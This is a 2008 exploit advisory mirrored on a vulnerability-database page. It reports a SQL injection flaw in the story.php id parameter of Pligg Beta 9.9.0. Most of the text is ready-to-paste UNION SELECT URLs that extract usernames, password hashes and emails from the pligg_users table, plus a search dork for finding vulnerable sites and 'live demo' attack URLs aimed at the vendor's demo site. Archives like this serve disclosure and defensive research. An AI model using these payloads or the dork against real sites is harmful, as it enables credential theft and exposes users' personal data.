Lucene search

K

pliggcms-sql.txt

🗓️ 28 Jul 2008 00:00:00Reported by Hussin XType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 4161 Views

Pligg Beta 9.9.0 Remote SQL Injection Vulnerability by Hussin

Show more
Code
`|___________________________________________________|  
|  
| Pligg Beta 9.9.0 (id) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------------Hussin X----------------------|  
|  
| Author: Hussin X  
|  
| Home : www.tryag.cc/cc  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|  
|___________________________________________________  
| |  
|  
|  
| script : http://www.pligg.com/  
|  
| DorK : Powered By Pligg | Legal: License and Source  
|  
| version : 9.9.0   
|___________________________________________________|  
  
  
  
Exploit:   
  
  
USER :  
  
www.[target].com/Script/story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_login,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--  
  
  
PASSWORD :  
  
story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_pass,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--  
  
  
EMAIL :  
  
www.[target].com/Script/story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_email,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--  
  
  
  
  
  
L!VE DEMO: :  
  
USER :  
  
http://www.pligg.com/demo01/story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_login,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--  
  
PASSWORD :  
  
http://www.pligg.com/demo01/story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_pass,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--  
  
  
  
  
  
  
  
____________________________( Greetz )____________________________  
|  
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke  
|   
| Iraqihack | FAHD | mos_chori | Silic0n   
|  
|_________________________________________________________________  
  
  
Im IRAQi  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo